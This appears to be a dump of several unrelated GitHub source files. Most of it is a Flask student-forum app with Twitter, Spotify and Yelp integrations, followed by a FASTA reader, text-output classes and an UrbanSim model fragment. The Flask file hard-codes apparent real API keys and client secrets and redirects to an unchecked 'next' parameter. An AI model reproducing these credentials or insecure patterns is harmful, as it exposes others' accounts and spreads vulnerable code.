    """New-post form; the `tweet` checkbox requests a Twitter cross-post
    (consumed by the new_post route)."""
    title = StringField('Title', validators=[DataRequired()])
    content = TextAreaField('Content', validators=[DataRequired()])
    submit = SubmitField('Post')
    tweet = BooleanField('Post On Twitter')
class spotify_profile(FlaskForm):
    """Form fields for a Spotify artist entry.

    NOTE(review): no SubmitField is declared and the form is not used by
    any route visible in this file -- presumably consumed elsewhere;
    verify before removing.
    """
    artist_name = StringField('Artist', validators=[DataRequired()])
    artist_id = StringField('Artist_ID', validators=[DataRequired()])
    # time_range = StringField('time_range')
########################
## END FORMS ##
########################
@app.route("/", methods=['GET', 'POST'])
@app.route("/home", methods=['GET', 'POST'])
def home():
    """Main board: render every post from the general forum.

    Dev notes: `export FLASK_DEBUG=1` for debug mode, then `flask run`.
    """
    all_posts = Post.query.all()
    return render_template("home.html", posts=all_posts)
# @app.route("/funny")
# def funny():
# return render_template("funny.html")
#
#
@app.route("/Events", methods=['GET', 'POST'])
def eve():
    """Events board: list every event post."""
    event_posts = Post_ev.query.all()
    return render_template("Events.html", posts=event_posts)
@app.route("/funny", methods=['GET', 'POST'])
def fun():
    """Humour board: list every funny post."""
    humour_posts = Post_h.query.all()
    return render_template("funny.html", posts=humour_posts)
@app.route("/studyLounge", methods=['GET', 'POST'])
def study_lounge():
    """Study lounge board: list every academic post."""
    academic_posts = Post_ac.query.all()
    return render_template("studylounge.html", posts=academic_posts)
@app.route("/sports", methods=['GET', 'POST'])
def sports():
    """Sports board: list every sports post."""
    sports_posts = Post_sp.query.all()
    return render_template("sports.html", posts=sports_posts)
@app.route("/course", methods=['GET', 'POST'])
def course():
    """Course board: list every course post."""
    course_posts = Post_cr.query.all()
    return render_template("course.html", posts=course_posts)
@app.route('/profile/<username>')
def user_profile(username):
    """Public profile page for *username*.

    Bug fix: an unknown username used to crash with an AttributeError on
    ``data.id`` (``.first()`` returned None); ``first_or_404`` now serves
    a 404 page instead.
    """
    data = User.query.filter_by(username=username).first_or_404()
    spotify_data = SpotifyArtist.query.filter_by(user_id=data.id).first()
    artistArr = []
    if spotify_data is not None:
        names = spotify_data.artist_name.split(',! ')
        # The stored string holds 3 time ranges x 10 artists plus a
        # trailing empty piece (== 31); show only the long-term slice.
        if len(names) == 31:
            artistArr = names[20:-1]
        return render_template("user_profile.html", posts=data, art=artistArr, len=len(artistArr))
    # No stored Spotify data: fall back to a bare page with the username.
    return str(username)
@app.route("/resources")
def resources():
    """Static resources page (no dynamic data)."""
    return render_template("resources.html")
def save_image(form_picture):
    """Save an uploaded picture as a 125x125 thumbnail under static/image.

    A random hex file name avoids collisions while the original
    extension is preserved.  Returns the generated file name.
    """
    random_h = secrets.token_hex(8)
    _, fext = os.path.splitext(form_picture.filename)
    picture_fn = random_h + fext
    picture_path = os.path.join(app.root_path, 'static/image', picture_fn)
    output_size = (125, 125)
    # Bug fix: the Image object was never closed; the context manager
    # releases the underlying file handle once the thumbnail is saved.
    with Image.open(form_picture) as i:
        i.thumbnail(output_size)
        i.save(picture_path)
    return picture_fn
@app.route("/profile", methods = ['GET', 'POST'])
@login_required
def profile(artists=None, artist_ids=None):
    """Account page: update username/email/avatar and show stored Spotify artists.

    *artists* / *artist_ids* are optional nested lists (one inner list per
    Spotify time range) supplied by internal callers after a Spotify sync;
    Flask itself never passes them.  Bug fix: the originals were mutable
    default arguments (`artists=[]`), a classic Python pitfall.  Debug
    prints and unused locals were also removed.
    """
    artists = [] if artists is None else artists
    artist_ids = [] if artist_ids is None else artist_ids
    if len(artists) != 0:
        # Flatten the nested lists into the delimited strings that a
        # SpotifyArtist row stores: ",! " between names, ", " between ids.
        artists_string = ""
        artists_id_string = ""
        for i in range(len(artists)):
            for j in range(len(artists[0])):
                artists_string += artists[i][j] + ",! "
                artists_id_string += artist_ids[i][j] + ", "
        spo = SpotifyArtist(artist_name=artists_string, artist_id=artists_id_string, author=current_user)
        db.session.add(spo)
        db.session.commit()
    form = update_account()
    if form.validate_on_submit():
        if form.picture.data:
            pic_file = save_image(form.picture.data)
            current_user.user_pic = pic_file
        current_user.username = form.username.data
        current_user.email = form.email.data
        db.session.commit()
        flash('You account is updated! ', 'success')
        # Redirect so a browser refresh does not re-submit the form.
        return redirect(url_for('profile'))
    elif request.method == 'GET':
        # Pre-fill the form with the current account details.
        form.username.data = current_user.username
        form.email.data = current_user.email
    # NOTE(review): `width=100` becomes a ?width=100 query parameter on the
    # static URL -- confirm the template actually consumes it.
    image_file = url_for('static', filename='image/' + current_user.user_pic, width=100)
    dbArtists = SpotifyArtist.query.filter_by(user_id=current_user.id).first()
    artistArr = []
    if dbArtists is not None:
        names = dbArtists.artist_name.split(',! ')
        # 3 time ranges x 10 artists plus a trailing empty piece == 31;
        # display only the last (long-term) slice of 10.
        if len(names) == 31:
            artistArr = names[20:-1]
    return render_template("profile.html", title='Profile', image_file=image_file, form=form, leng=len(artistArr), posts=artistArr)
@app.route("/register", methods=['GET','POST'])
def register():
    """Sign-up page: create a User row with a bcrypt-hashed password."""
    if current_user.is_authenticated:
        return redirect(url_for('home'))
    form = account()
    if not form.validate_on_submit():
        # GET request, or a submission that failed validation.
        return render_template('register.html', title = 'Register', form = form)
    # Never store the plain-text password; keep only the bcrypt hash.
    hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
    new_user = User(username = form.username.data, email = form.email.data, password = hashed_password)
    db.session.add(new_user)
    db.session.commit()
    flash(f'Account created! You can now log in! ','success')
    return redirect(url_for('login'))
@app.route("/login", methods = ['GET', 'POST'])
def login():
    """Log-in page: verify credentials and start a Flask-Login session."""
    if current_user.is_authenticated:
        return redirect(url_for('home'))
    form = LoginForm()
    if form.validate_on_submit():
        matched = User.query.filter_by(email = form.email.data).first()
        if matched and bcrypt.check_password_hash(matched.password, form.password.data):
            login_user(matched, remember = form.remeber.data)
            # Honour a ?next=... target when login was forced by @login_required.
            next_page = request.args.get('next')
            return redirect(next_page) if next_page else redirect(url_for('home'))
        flash('Login not successful. Please check your password and email.', 'danger')
    return render_template('login.html', title = 'Login', form = form)
@app.route("/logout")
def logout():
    """End the current session and send the visitor back to the home page."""
    logout_user()
    return redirect(url_for('home'))
# NOTE(review): `gloabal_true` (sic) is defined False and never set True
# anywhere in this file, so the Twitter branch below is effectively dead;
# confirm whether another module flips it before removing.
gloabal_true = False
@app.route("/post/new", methods=['GET', 'POST'])
@login_required
def new_post():
    """Create a post on the general board, optionally tweeting its content.

    The Twitter path reads the OAuth access token/secret stored in the
    session by twitter_callback().  SECURITY(review): the consumer key
    and secret are hard-coded below and should be moved to configuration.
    """
    form = PostForm()
    if gloabal_true == True:
        twitter_consumer_key = "bw5c7K2tzsceOlgenVFDRnogU"
        twitter_consumer_secret = "CTXbMs9vFwFCdYrM2CGkVsSsLl53LpO43FNeAwTcX5zukDg36m"
        token_url = 'https://api.twitter.com/1.1/statuses/update.json'
        token_secret = (session["twitter_secret"])
        access_token = (session["twitter_token"])
        print ("Auth: ")
        print(access_token, token_secret)
        # Only tweet when the "Post On Twitter" checkbox was ticked.
        if form.tweet.data == True:
            print ("it is true")
            auth = tweepy.OAuthHandler(twitter_consumer_key, twitter_consumer_secret)
            auth.set_access_token(access_token, token_secret)
            # Create API object
            api = tweepy.API(auth)
            # Create a tweet
            api.update_status(form.content.data)
    if form.validate_on_submit():
        post = Post(title=form.title.data, content=form.content.data, author=current_user)
        db.session.add(post)
        db.session.commit()
        flash('Your post has been created', 'success')
        return redirect(url_for('home'))
    return render_template('create_post.html', title = 'Forum', form = form)
@app.route("/post/new/ac", methods=['GET', 'POST'])
@login_required
def new_post_ac():
    """Create a post on the academics (study lounge) board."""
    form = PostForm()
    # Bug fix: the original compared the BooleanField object itself to
    # True (`form.tweet == True`), which is never true; the submitted
    # value lives in `.data`.
    if form.tweet.data:
        flash("make a tweet", 'success')
    if form.validate_on_submit():
        post = Post_ac(title=form.title.data, content=form.content.data, author=current_user)
        db.session.add(post)
        db.session.commit()
        flash('Your post has been created', 'success')
        return redirect(url_for('home'))
    return render_template('create_post.html', title = 'Forum', form = form)
@app.route("/post/new/h", methods=['GET', 'POST'])
@login_required
def new_post_h():
    """Create a post on the humour (funny) board."""
    form = PostForm()
    # Bug fix: `form.tweet == True` compared the field object to True
    # (always False); the submitted value lives in `.data`.
    if form.tweet.data:
        flash("make a tweet", 'success')
    if form.validate_on_submit():
        post = Post_h(title=form.title.data, content=form.content.data, author=current_user)
        db.session.add(post)
        db.session.commit()
        flash('Your post has been created', 'success')
        return redirect(url_for('home'))
    return render_template('create_post.html', title = 'Forum', form = form)
@app.route("/post/new/sp", methods=['GET', 'POST'])
@login_required
def new_post_sp():
    """Create a post on the sports board."""
    form = PostForm()
    # Bug fix: `form.tweet == True` compared the field object to True
    # (always False); the submitted value lives in `.data`.
    if form.tweet.data:
        flash("make a tweet", 'success')
    if form.validate_on_submit():
        post = Post_sp(title=form.title.data, content=form.content.data, author=current_user)
        db.session.add(post)
        db.session.commit()
        flash('Your post has been created', 'success')
        return redirect(url_for('home'))
    return render_template('create_post.html', title = 'Forum', form = form)
@app.route("/post/new/ev", methods=['GET', 'POST'])
@login_required
def new_post_ev():
    """Create a post on the events board."""
    form = PostForm()
    # Bug fix: `form.tweet == True` compared the field object to True
    # (always False); the submitted value lives in `.data`.
    if form.tweet.data:
        flash("make a tweet", 'success')
    if form.validate_on_submit():
        post = Post_ev(title=form.title.data, content=form.content.data, author=current_user)
        db.session.add(post)
        db.session.commit()
        flash('Your post has been created', 'success')
        return redirect(url_for('home'))
    return render_template('create_post.html', title = 'Forum', form = form)
@app.route("/post/new/cr", methods=['GET', 'POST'])
@login_required
def new_post_cr():
    """Create a post on the course board."""
    form = PostForm()
    # Bug fix: `form.tweet == True` compared the field object to True
    # (always False); the submitted value lives in `.data`.
    if form.tweet.data:
        flash("make a tweet", 'success')
    if form.validate_on_submit():
        post = Post_cr(title=form.title.data, content=form.content.data, author=current_user)
        db.session.add(post)
        db.session.commit()
        flash('Your post has been created', 'success')
        return redirect(url_for('home'))
    return render_template('create_post.html', title = 'Forum', form = form)
# oauth = OAuth(app)
#
# twitter = oauth.remote_app('twitter',
# consumer_key = 'bw5c7K2tzsceOlgenVFDRnogU',
# consumer_secret='CTXbMs9vFwFCdYrM2CGkVsSsLl53LpO43FNeAwTcX5zukDg36m',
# base_url='https://api.twitter.com/1.1/',
# request_token_url='https://api.twitter.com/oauth/request_token',
# access_token_url='https://api.twitter.com/oauth/access_toke',
# authorize_url='https://api.twitter.com/oauth/authorize'
# )
# DELETE this
@app.route('/twitter_login')
def twitterPostForRequestToken():
    """Step 1 of the Twitter OAuth 1.0a dance: obtain a request token
    and redirect the user to Twitter's authorize page.

    SECURITY(review): the consumer key/secret are hard-coded and should
    live in configuration.  NOTE(review): the response is parsed via the
    private `_content` attribute and the raw "oauth_token=..." pair is
    appended to the authorize URL verbatim -- fragile; consider
    `post_response.text` and proper query parsing.
    """
    request_url = 'https://api.twitter.com/oauth/request_token'
    # Percent-encoded callback that Twitter redirects to after approval.
    twitter_redirect_url = "http%3A%2F%2Fsilt-tamu.herokuapp.com%2Ftwitter_callback"
    twitter_consumer_key = "bw5c7K2tzsceOlgenVFDRnogU"
    twitter_consumer_secret = "CTXbMs9vFwFCdYrM2CGkVsSsLl53LpO43FNeAwTcX5zukDg36m"
    tw = OAuth1(twitter_consumer_key, twitter_consumer_secret)
    # NOTE(review): `headers` is built but never sent with the request.
    headers = {'oauth_callback': twitter_redirect_url, 'oauth_consumer_key': twitter_consumer_key}
    post_response = requests.post(request_url, auth = tw)
    attrs = vars(post_response)
    twitter_oauth = attrs.get('_content')
    # Body looks like b'oauth_token=...&oauth_token_secret=...&...';
    # [2:] strips the "b'" prefix of the str() representation.
    oauth_arr = str(twitter_oauth)[2:].split('&')
    # Kept as full "key=value" pairs; oauth_token is reused verbatim below.
    oauth_token = oauth_arr[0]
    oauth_token_secret = oauth_arr[1]
    authorize_url = "https://api.twitter.com/oauth/authorize?" + oauth_token
    return redirect(authorize_url)
# 200 code indicates access token was properly granted
# if post_response.status_code == 200:
# json = post_response.json()
# return json['access_token'], json['refresh_token'], json['expires_in']
# else:
# print("LOGGING: " + 'getToken:' + str(post_response.status_code))
# # logging.error('getToken:' + str(post_response.status_code))
# return None
# https://yourCallbackUrl.com?oauth_token=NPcudxy0yU5T3tBzho7iCotZ3cnetKwcTIRlX0iwRl0&oauth_verifier=uw7NjWHT6OJ1MpJOXsHfNxoAhPKpgI8BlYDhxEjIBY
@app.route('/twitter_callback')
def twitter_callback():
    """Step 2 of the Twitter OAuth 1.0a flow: exchange for an access token.

    Twitter redirects here with oauth_token and oauth_verifier query
    parameters; exchange them for an access token/secret pair, store the
    pair in the session, and return to the home page.
    """
    # Read the parameters properly instead of hand-splitting request.url on '='.
    token = request.args.get('oauth_token')
    verifier = request.args.get('oauth_verifier')
    request_url = 'https://api.twitter.com/oauth/access_token'
    # NOTE(review): hard-coded credentials, duplicated from /twitter_login;
    # move to config and rotate.
    twitter_consumer_key = "bw5c7K2tzsceOlgenVFDRnogU"
    twitter_consumer_secret = "CTXbMs9vFwFCdYrM2CGkVsSsLl53LpO43FNeAwTcX5zukDg36m"
    tw = OAuth1(twitter_consumer_key, client_secret=twitter_consumer_secret,
                resource_owner_key=token, verifier=verifier)
    post_response = requests.post(request_url, auth=tw)
    # Body is form-encoded: oauth_token=..&oauth_token_secret=..&user_id=..&screen_name=..
    # Parse via Response.text (the old vars()/_content access left byte-repr
    # artifacts) and a key/value map instead of positional splitting.
    pairs = dict(p.split('=', 1) for p in post_response.text.split('&') if '=' in p)
    # Assignment overwrites any previous values, so no pop() is needed; the
    # debug prints that leaked the secret to stdout have been removed.
    session['twitter_token'] = pairs.get('oauth_token')
    session['twitter_secret'] = pairs.get('oauth_token_secret')
    session.modified = True
    return redirect('/')
##############################
# Spotify section
##############################
# Spotify prerequisites: OAuth client credentials and authorization settings.
# NOTE(review): client id/secret are hard-coded and committed; move them to
# app config / environment variables and rotate the exposed credentials.
CLI_ID = "035c861c44084c46bf08f93efed2bb4c"
CLI_SEC = "18cba64539fc4c39894f8b17b4e78b6e"
# Base URL of Spotify's accounts service (authorization + token endpoints).
API_BASE = 'https://accounts.spotify.com'
# Must exactly match the redirect URI registered in the Spotify dashboard.
REDIRECT_URI = "http://silt-tamu.herokuapp.com/api_callback"
# Comma-separated OAuth scopes. NOTE(review): there is a stray space before
# 'user-library-read' — confirm Spotify tolerates it.
SCOPE = 'playlist-modify-private,playlist-modify-public,user-top-read, user-library-read'
# Set this to True for testing but you probably want it set to False in production.
SHOW_DIALOG = True
# Spotify pre-requirements end
@app.route("/spotify_authorize")
def authorize():
client_id = CLI_ID
redirect_uri = REDIRECT_URI
# TODO: change scope value
scope = SCOPE
# state_key = createStateKey(15)
# session['state_key'] = state_key
authorize_url = 'https://accounts.spotify.com/en/authorize?'
# parameters = 'response_type=code&client_id=' + client_id + '&redirect_uri=' + redirect_uri + '&scope=' + scope + '&state=' + state_key
parameters = 'response_type=code&client_id=' + client_id + '&redirect_uri=' + redirect_uri + '&scope=' + scope
response = make_response(redirect(authorize_url + parameters))
print("response")
return response
"""
Called after a new user has authorized the application through the Spotift API page.
Stores user information in a session and redirects user back to the page they initally
attempted to visit.
"""
@app.route('/api_callback')
def callback():
    """Handle Spotify's OAuth redirect.

    Exchanges the authorization code for tokens, stores them in the session,
    loads the user's profile and top artists, and renders the profile page.

    Fix: the error branch now returns immediately instead of falling through
    and calling the Spotify API with no token in the session.
    """
    if request.args.get('error'):
        print("Error: Spotify error")
        return "Spotify authorization error"
    code = request.args.get('code')
    # get access token to make requests on behalf of the user
    payload = getToken(code)
    if payload is None:
        return "Failed to access token"
    session['token'] = payload[0]
    session['refresh_token'] = payload[1]
    session['token_expiration'] = time.time() + payload[2]
    current_user = getUserInformation(session)
    session['user_id'] = current_user['id']
    print("LOGGING: " + 'new user:' + session['user_id'])
    # Top artists for all three Spotify time ranges (short/medium/long term).
    artist_names, artist_ids = getAllTopArtists(session)
    return profile(artists=artist_names, artist_ids=artist_ids)
def getToken(code):
    """Exchange an authorization code for Spotify tokens.

    Returns (access_token, refresh_token, expires_in) on success, or None
    (after logging the HTTP status) on any non-200 response.
    """
    headers = {'Accept': 'application/json', 'Content-Type': 'application/x-www-form-urlencoded'}
    body = {'code': code, 'redirect_uri': REDIRECT_URI, 'grant_type': 'authorization_code',
            'client_id': CLI_ID, 'client_secret': CLI_SEC}
    post_response = requests.post('https://accounts.spotify.com/api/token',
                                  headers=headers, data=body)
    # Anything other than 200 means the grant failed.
    if post_response.status_code != 200:
        print("LOGGING: " + 'getToken:' + str(post_response.status_code))
        return None
    json = post_response.json()
    return json['access_token'], json['refresh_token'], json['expires_in']
"""
Makes a GET request with the proper headers. If the request succeeds, the json parsed
response is returned. If the request fails because the access token has expired, the
check token function is called to update the access token.
Returns: Parsed json response if request succeeds or None if request fails
"""
def makeGetRequest(session, url, params={}):
    """Issue an authorized GET against the Spotify Web API.

    Sends the session's bearer token. On HTTP 200 the parsed JSON body is
    returned; on 401 the token is refreshed via checkTokenStatus() and the
    request retried; any other status (or failed refresh) yields None.
    """
    headers = {"Authorization": "Bearer {}".format(session['token'])}
    response = requests.get(url, headers=headers, params=params)
    if response.status_code == 200:
        return response.json()
    # Expired token: refresh and retry; give up on any other failure.
    if response.status_code == 401 and checkTokenStatus(session) != None:
        return makeGetRequest(session, url, params)
    return None
def getUserInformation(session):
    """Return the current user's Spotify profile, or None on failure.

    makeGetRequest already returns None on failure, so the redundant
    `if payload == None: return None` round-trip has been removed.
    """
    url = 'https://api.spotify.com/v1/me'
    return makeGetRequest(session, url)
"""
Gets the top tracks of a user for all three time intervals. Used to display the top
tracks on the TopTracks feature page.
Returns: A list of tracks IDs for each of the three time intervals
"""
def getAllTopTracks(session, limit=10):
    """Get the user's top tracks for all three Spotify time intervals.

    Args:
        session: Flask session holding the access token.
        limit: maximum tracks per interval (default 10).

    Returns:
        A list of three lists of track IDs (short/medium/long term), or
        None if any API request fails.
    """
    url = 'https://api.spotify.com/v1/me/top/tracks'
    track_ids = []
    # Loop variable renamed from `time`, which shadowed the imported module.
    for term in ('short_term', 'medium_term', 'long_term'):
        params = {'limit': limit, 'time_range': term}
        payload = makeGetRequest(session, url, params)
        if payload is None:
            return None
        track_ids.append([track['id'] for track in payload['items']])
    return track_ids
# TODO: situation where user has no tracks
def getAllTopArtists(session, limit=10):
    """Get the user's top artists for all three Spotify time intervals.

    Args:
        session: Flask session holding the access token.
        limit: maximum artists per interval (default 10).

    Returns:
        (artist_names, artist_ids): two parallel lists of three lists each
        (short/medium/long term), or None if any API request fails.

    Fixes: removed the unused `track_range_ids` local and renamed the loop
    variable `time`, which shadowed the imported module.
    """
    url = 'https://api.spotify.com/v1/me/top/artists'
    artist_names = []
    artist_ids = []
    for term in ('short_term', 'medium_term', 'long_term'):
        params = {'limit': limit, 'time_range': term}
        payload = makeGetRequest(session, url, params)
        if payload is None:
            return None
        artist_names.append([artist['name'] for artist in payload['items']])
        artist_ids.append([artist['id'] for artist in payload['items']])
    return artist_names, artist_ids
##############################
# Yelp API Section #
##############################
""" END POINTS """
# Business Search URL -- 'https://api.yelp.com/v3/businesses/search'
# Phone Search URL -- 'https://api.yelp.com/v3/businesses/search/phone'
# Transaction Search URL -- 'https://api.yelp.com/v3/transactions/{transaction_type}/search'
# Business Details URL -- 'https://api.yelp.com/v3/businesses/{id}'
# Business Match URL -- 'https://api.yelp.com/v3/businesses/matches'
# Reviews URL -- 'https://api.yelp.com/v3/businesses/{id}/reviews'
# Autocomplete URL -- 'https://api.yelp.com/v3/autocomplete'
# Define my API key, Endpoint, and Header
# NOTE(review): the Yelp API key is hard-coded and committed; move it to
# configuration / an environment variable and rotate the exposed key.
API_KEY = 'nTM36O5k4QpcgkccZVAMhP8U4BxpO68EYzIA7KPXpRmnT31qUK49B7sfYQ2uA2_uzGRr94oA9aIxdD4PyIa0hyaXIccmnOGCVQ2tMJg4s3-a24CLE3syjaMHsqWRX3Yx'
# Common prefix for all Yelp Fusion v3 endpoints.
ENDPOINT_PREFIX = 'https://api.yelp.com/v3/'
# Bearer-token auth header sent with every Yelp request.
HEADERS = {'Authorization': 'bearer %s' % API_KEY}
# Pre-serialized empty JSON body returned on non-200 Yelp responses.
EMPTY_RESPONSE = json.dumps('')
# render popular locations webpage / make yelp API calls with user input for 'term' key
@app.route("/popular_locations", methods=['GET'])
def popular_locations():
    """Search Yelp for businesses near College Station and map the results.

    Reads the 'searchInput' query parameter, queries the Yelp business
    search endpoint, writes a folium map of the matches to
    templates/yelpMap.html, and renders popularLocations.html with the
    result dataframe.
    """
    # get user input from html form
    term = request.args.get('searchInput', None)
    # Check if user inputted a term
    if term == None:
        # NOTE(review): execution still continues and queries Yelp with
        # term=None despite this message — confirm whether an early return
        # was intended.
        print("No term provided for business search, return nothing.")
    # Define Business Search paramters
    parameters = {
        'location': 'College Station, TX',
        'radius': 15000,
        'term': term,
        'sort_by': 'best_match',
        'limit': 50
    }
    # Make request to Yelp API
    url = ENDPOINT_PREFIX + 'businesses/search'
    response = requests.get(url, params = parameters, headers = HEADERS)
    # Check for good status code - if so, get JSON response and populate map
    if response.status_code == 200:
        print('Got 200 for business search')
        # Try/catch for invalid user input for 'term': key-value
        # (also catches responses where a column such as 'price' is missing
        # from some businesses, which raises KeyError on the dataframe)
        try:
            # Convert JSON string to dictionary
            businessSearchData = response.json()
            # Create dataframe from API response (businesses, list of dictionaries)
            dFrame = pd.DataFrame.from_dict(businessSearchData['businesses'])
            # YELP MAP - RESTAURANTS MARKED
            # Get latitude and longitude from Yelp API response
            cStatLat = 30.627977
            cStatLong = -96.334404
            # Generate base map of college station
            yelpMap = folium.Map(location = [cStatLat, cStatLong], zoom_start = 13)
            # Generate map of restaurants - Iterate through dataframe and add business markers
            for row in dFrame.index:
                latLong = dFrame['coordinates'][row]
                latitude = latLong['latitude']
                longitude = latLong['longitude']
                name = dFrame['name'][row]
                rating = dFrame['rating'][row]
                price = dFrame['price'][row]
                location = dFrame['location'][row]
                # Get address-1 from Location dictionary
                for loc in location.keys():
                    if loc == 'address1':
                        address = location[loc]
                # Create popup message for pin
                details = ('{}' + '<br><br>' + 'Address: {}' + '<br>' + 'Price: {}' + '<br>' + 'Rating: {}/5').format(name, address, price, rating)
                # Resize popup pin
                test = folium.Html(details, script = True)
                popup = folium.Popup(test, max_width = 300, min_width = 300)
                # Create and business marker to map
                marker = folium.Marker(location = [latitude, longitude], popup = popup, icon = folium.Icon(color = "darkred"))
                marker.add_to(yelpMap)
            # Display map on webpage
            yelpMap.save('./templates/yelpMap.html')
        except KeyError:
            print('ERROR: User input provided an invalid key-value.')
            flash(f'There was an error with your input.', 'danger')
            return redirect(url_for('popular_locations'))
    else:
        print('Received non-200 response({}) for business search, returning empty response'.format(response.status_code))
        return EMPTY_RESPONSE
    # dFrame is defined inside the try block above; this return is only
    # reached on the successful 200 path, where it is guaranteed to exist.
    return render_template('popularLocations.html', businessData = dFrame, isBusinessDataEmpty = dFrame.empty)
@app.route("/yelp_map")
def yelp_map():
return render_template('yelpMap.html')
@app.route("/empty_yelp_map")
def empty_yelp_map():
return render_template('./templates/blank_yelpMap.html')
if __name__ == '__main__':
    # Development entry point; debug=True must not be used in production.
    app.run(debug=True)
| infknight/SILT | app.py | app.py | py | 37,771 | python | en | code | 0 | github-code | 36 |
74332199142 | from Bio import SeqIO
import sys
def readin_fasta(input_file, batch_size):
    """Read a FASTA file and yield (titles, sequences) batches.

    Uses Biopython's SimpleFastaParser for fast, memory-efficient streaming.

    Args:
        input_file: path to the FASTA file.
        batch_size: number of records per yielded batch.

    Yields:
        (title_list, seq_list): parallel lists of up to batch_size headers
        and sequences.

    Fixes over the original: both file handles are now closed via context
    managers, and the final partial batch is only yielded when non-empty
    (the original emitted an empty trailing batch whenever the record count
    was an exact multiple of batch_size).
    """
    # First pass: count records (header lines start with '>') for the
    # progress message.
    with open(input_file) as handle:
        seq_num = sum(1 for line in handle if line.startswith(">"))
    title_list = []
    seq_list = []
    with open(input_file) as handle:
        for i, (title, seq) in enumerate(SeqIO.FastaIO.SimpleFastaParser(handle), 1):
            title_list.append(title)
            seq_list.append(seq)
            if i % batch_size == 0:
                yield title_list, seq_list
                title_list = []
                seq_list = []
    if seq_num:
        print('Converted {} of {} fragments'.format(seq_num, seq_num))
    if title_list:
        yield title_list, seq_list
| elond/11785_Project | data_processing/encoding_convert/readin_fasta.py | readin_fasta.py | py | 697 | python | en | code | 0 | github-code | 36 |
6519474113 | from core_functions import Chain, Reel
from tabulate import tabulate
from colorama import init as colorama_init, Fore
class ChainOutput():
    """Render a Chain as a single colourised line of text.

    Elements are joined by an edge glyph; elements belonging to the loop
    portion of the chain are highlighted in yellow, the rest in white.
    """

    # colorama colour codes used while rendering
    COLORS = {
        "element": Fore.LIGHTWHITE_EX,
        "element_loop": Fore.LIGHTYELLOW_EX,
        "edge": Fore.LIGHTBLACK_EX,
    }

    # glyphs used while rendering
    SYMBOLS = {
        "edge": " ━ "
    }

    def __init__(self, chain: Chain.Chain):
        """Build the rendered string for *chain*.

        :param chain: (values, loop_start) pair — values at index >=
            loop_start are part of the loop and get the loop colour.
        """
        colorama_init()
        values, loop_start = chain
        # retained for compatibility with the original implementation;
        # never populated there either
        self.idx_is_loop = []
        rendered = []
        final_idx = len(values) - 1
        for idx, item in enumerate(values):
            colour = (self.COLORS["element_loop"] if idx >= loop_start
                      else self.COLORS["element"])
            piece = colour + str(item)
            # edge glyph between elements, but not after the last one
            if idx != final_idx:
                piece += self.COLORS["edge"] + self.SYMBOLS["edge"]
            # reset highlight; it's the right thing to do :)
            rendered.append(piece + Fore.RESET)
        self.out = "".join(rendered)

    def __str__(self):
        """Return the rendered chain string."""
        return self.out
class ReelOutput():
    """Render a Reel as a tabulated text table.

    Each row holds a reel item's starting value and its rendered chain
    (a ChainOutput, stringified by tabulate), with an optional dim column
    separator between them.
    """
    # constant: colorama colours for output
    COLORS = {
        "separator": Fore.LIGHTBLACK_EX
    }
    # constant: symbols for output
    SYMBOLS = {
        "separator": "┆"
    }
    # constant: table style passed to tabulate
    TABLE_STYLE = "plain"
    # constant: when False, the separator column is stripped before tabulating
    MIDDLE_SEPARATOR = True
    def __init__(self, reel: Reel.Reel):
        """
        constructor
        @param reel: Reel to output; each item must expose
            `starting_value` and `chain` attributes
        """
        # initialise colorama
        colorama_init()
        # header row: Index | separator | Chain
        self.array = [["Index", self.COLORS["separator"] + self.SYMBOLS["separator"] + Fore.RESET, "Chain"]]
        # one row per reel item; the ChainOutput cell is rendered lazily by
        # tabulate via its __str__
        for item in reel:
            self.array.append([item.starting_value, self.COLORS["separator"] + self.SYMBOLS["separator"] + Fore.RESET, ChainOutput(item.chain)])
        # remove middle column if MIDDLE_SEPARATOR is False
        if not self.MIDDLE_SEPARATOR:
            for col in self.array:
                col.pop(1)
        # use tabulate to format table
        self.out = tabulate(self.array, tablefmt=self.TABLE_STYLE, headers="firstrow")
    def __str__(self):
        """
        string representation of ReelOutput
        @return: out
        """
        return self.out
| jahinzee/FourHasFourLetters | outputs.py | outputs.py | py | 2,885 | python | en | code | 0 | github-code | 36 |
28522630327 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
from opus_core.datasets.dataset import Dataset
from opus_core.resources import Resources
from opus_core.choice_model import ChoiceModel
from opus_core.model import prepare_specification_and_coefficients
from opus_core.model import get_specification_for_estimation
from numpy import array, arange, where, ones, concatenate
from opus_core.variables.variable_name import VariableName
from opus_core.sampling_toolbox import sample_noreplace
from opus_core.misc import unique
from opus_core.logger import logger
from urbansim_parcel.datasets.development_project_proposal_dataset import DevelopmentProjectProposalDataset
from urbansim_parcel.models.development_project_proposal_sampling_model import DevelopmentProjectProposalSamplingModel
import copy
class DevelopmentProjectProposalChoiceModel(ChoiceModel, DevelopmentProjectProposalSamplingModel):
    """Choice model over tentative development project proposals.

    Each proposal selected by `filter` is assigned one of the alternatives
    [1, 2]; the chosen alternative is written back to the proposal set's
    `is_chosen` attribute. The sampling base class is initialised in
    __init__, but its run() invocation in run() is currently commented out.
    """
    model_name = "Development Project Proposal Choice Model"
    model_short_name = "DPPCM"
    def __init__(self,
                 proposal_set,
                 sampler="opus_core.samplers.weighted_sampler",
                 weight_string = None,
                 run_config=None,
                 estimate_config=None,
                 debuglevel=0,
                 dataset_pool=None,
                 filter="development_project_proposal.status_id==%s" % DevelopmentProjectProposalDataset.id_tentative,
                 choice_attribute_name='is_chosen',
                 **kwargs):
        """
        proposal_set: the DevelopmentProjectProposalDataset to operate on.
        filter: expression selecting the proposals the model runs over.
        choice_attribute_name: attribute receiving the chosen alternative.

        NOTE(review): the `sampler` and `weight_string` arguments are
        effectively ignored — the sampling base class below is initialised
        with hard-coded values instead.
        """
        # status id used to build the hard-coded sampling weight expression
        self.id_selected = 9
        self.proposal_set = proposal_set
        self.filter = filter
        self.choice_attribute_name = copy.copy(choice_attribute_name)
        # Alternatives are the two choice values 1 and 2.
        # NOTE(review): get_alias() is called on choice_attribute_name in
        # prepare_for_estimate, so ChoiceModel.__init__ presumably wraps the
        # plain string into a VariableName — TODO confirm.
        ChoiceModel.__init__(self, [1, 2],
                             choice_attribute_name=choice_attribute_name,
                             **kwargs)
        DevelopmentProjectProposalSamplingModel.__init__(self,
                                                         proposal_set,
                                                         sampler="opus_core.samplers.weighted_sampler",
                                                         weight_string = "development_project_proposal.status_id==%s" % self.id_selected,
                                                         #weight_string = "development_project_proposal.status_id==%s" % self.id_selected,
                                                         run_config=run_config,
                                                         estimate_config=estimate_config,
